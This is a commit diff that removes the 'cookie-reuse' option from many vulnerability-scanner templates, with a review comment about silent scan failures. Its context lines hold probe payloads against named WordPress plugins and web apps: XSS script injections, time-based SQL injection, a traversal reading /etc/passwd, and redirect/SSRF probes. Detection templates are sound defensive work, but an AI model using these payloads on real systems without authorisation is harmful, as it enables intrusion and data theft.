removed cookie-reuse
parent
8933d38ed8
commit
3a48ec7681
|
@ -28,7 +28,6 @@ http:
|
||||||
|
|
||||||
utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login
|
utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: xpath
|
- type: xpath
|
||||||
|
|
|
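Review bot: Removing `cookie-reuse: true` leaves the login POST in this hunk, and whatever request follows it, dependent on the engine's default cookie handling, and nothing in the template records that assumption. On an engine build that does not keep cookies between requests by default, the session set by the login step would not be sent with the later request, so the extractor or matcher would never fire and the scan would report a clean result rather than an error. Every other hunk in this commit drops the same line, including the `/wp-admin/` and `/assets/` checks that appear to run after a login. I would note the requirement beside the request block, for example `# needs an engine that keeps cookies across requests by default`, and state the minimum engine version in the commit description. The request blocks begin above the visible hunk lines and the file names are not shown, so the multi-step structure is inferred from the login bodies and authenticated paths.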
@ -25,7 +25,6 @@ http:
|
||||||
|
|
||||||
_authentication_token={{auth_token}}&username={{username}}&password={{password}}
|
_authentication_token={{auth_token}}&username={{username}}&password={{password}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -27,7 +27,6 @@ http:
|
||||||
|
|
||||||
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}
|
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=×tamp={{timestamp}}×tamp_secret={{timestamp_secret}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: xpath
|
- type: xpath
|
||||||
|
|
|
@ -29,7 +29,6 @@ http:
|
||||||
|
|
||||||
{"username":"{{username}}","password":"{{password}}"}
|
{"username":"{{username}}","password":"{{password}}"}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
attack: pitchfork
|
attack: pitchfork
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
@ -33,7 +33,6 @@ http:
|
||||||
|
|
||||||
authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0
|
authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
attack: pitchfork
|
attack: pitchfork
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
@ -46,7 +46,6 @@ http:
|
||||||
|
|
||||||
lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings
|
lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1
|
GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
|
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
|
GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -38,7 +38,6 @@ http:
|
||||||
GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
|
GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
|
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -41,7 +41,6 @@ http:
|
||||||
GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
redirects: true
|
redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1
|
GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1
|
GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1
|
GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1
|
GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1
|
GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1
|
GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1
|
GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/pagination/readme.txt HTTP/1.1
|
GET /wp-content/plugins/pagination/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1
|
GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/promobar/readme.txt HTTP/1.1
|
GET /wp-content/plugins/promobar/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1
|
GET /wp-content/plugins/rating-bws/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/realty/readme.txt HTTP/1.1
|
GET /wp-content/plugins/realty/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1
|
GET /wp-content/plugins/visitors-online/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1
|
GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -44,7 +44,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1
|
GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1
|
GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/sender/readme.txt HTTP/1.1
|
GET /wp-content/plugins/sender/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/updater/readme.txt HTTP/1.1
|
GET /wp-content/plugins/updater/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -43,7 +43,6 @@ http:
|
||||||
GET /wp-content/plugins/user-role/readme.txt HTTP/1.1
|
GET /wp-content/plugins/user-role/readme.txt HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 3
|
max-redirects: 3
|
||||||
|
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
|
|
||||||
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register
|
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -37,7 +37,6 @@ http:
|
||||||
GET /session/login HTTP/1.1
|
GET /session/login HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -39,7 +39,6 @@ http:
|
||||||
GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1
|
GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -38,7 +38,6 @@ http:
|
||||||
GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1
|
GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -42,7 +42,6 @@ http:
|
||||||
GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1
|
GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date="><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/account-owners.php HTTP/1.1
|
GET /assets/account-owners.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /admin/ssl-fields/ HTTP/1.1
|
GET /admin/ssl-fields/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/registrars.php HTTP/1.1
|
GET /assets/registrars.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /admin/dw/servers.php HTTP/1.1
|
GET /admin/dw/servers.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 3
|
max-redirects: 3
|
||||||
|
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/dns.php HTTP/1.1
|
GET /assets/dns.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/hosting.php HTTP/1.1
|
GET /assets/hosting.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/ssl-providers.php HTTP/1.1
|
GET /assets/ssl-providers.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/ssl-accounts.php HTTP/1.1
|
GET /assets/ssl-accounts.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -45,7 +45,6 @@ http:
|
||||||
GET /assets/categories.php HTTP/1.1
|
GET /assets/categories.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -66,7 +66,6 @@ http:
|
||||||
GET /Uploads/{{randstr}}.php7 HTTP/1.1
|
GET /Uploads/{{randstr}}.php7 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
|
|
||||||
|
|
|
@ -51,7 +51,6 @@ http:
|
||||||
|
|
||||||
form_build_id={{form_build_id}}
|
form_build_id={{form_build_id}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
max-redirects: 2
|
max-redirects: 2
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -35,7 +35,6 @@ http:
|
||||||
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
GET {{BaseURL}}/whoAmI/ HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
|
@ -40,7 +40,6 @@ http:
|
||||||
GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
|
GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
cookie-reuse: true
|
|
||||||
